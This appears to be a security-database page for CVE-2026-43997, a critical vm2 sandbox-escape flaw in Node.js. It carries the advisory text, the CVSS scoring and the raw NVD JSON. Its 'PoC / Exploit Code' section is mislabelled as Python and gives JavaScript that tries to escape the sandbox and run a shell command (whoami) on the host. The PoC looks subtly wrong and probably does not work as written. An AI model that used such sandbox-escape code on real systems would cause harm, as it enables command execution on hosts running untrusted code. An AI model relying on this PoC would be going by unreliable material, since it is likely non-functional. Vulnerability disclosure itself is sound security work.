Security Vulnerability Report
中文
CVE-2026-43997 CVSS 10.0 CRITICAL

CVE-2026-43997

Published: 2026-05-13 18:16:16
Last Modified: 2026-05-14 15:37:31
Source: [email protected]

Description

vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE
vm2 < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
const {VM} = require('vm2'); const vm = new VM(); // Malicious payload targeting the sandbox escape const exploit = ` try { // Attempt to access the host context/object const hostObject = this; // Step 1: Use getOwnPropertySymbols to leak symbols const symbols = Object.getOwnPropertySymbols(hostObject); // Step 2: Identify the specific nodejs.util.inspect.custom symbol const dangerousSymbol = symbols.find(s => s.toString() === 'Symbol(nodejs.util.inspect.custom)'); if (dangerousSymbol) { // Step 3: Use the symbol to escape the sandbox const escapeFunction = hostObject[dangerousSymbol]; // Execute arbitrary command on the host escapeFunction.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString(); } } catch(e) { e; } `; console.log('Exploiting CVE-2026-43997...'); vm.run(exploit);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43997", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:16.177", "lastModified": "2026-05-14T15:37:30.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.11.0", "matchCriteriaId": "6DD48308-6219-4C66-9BE7-246EE56FB834"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.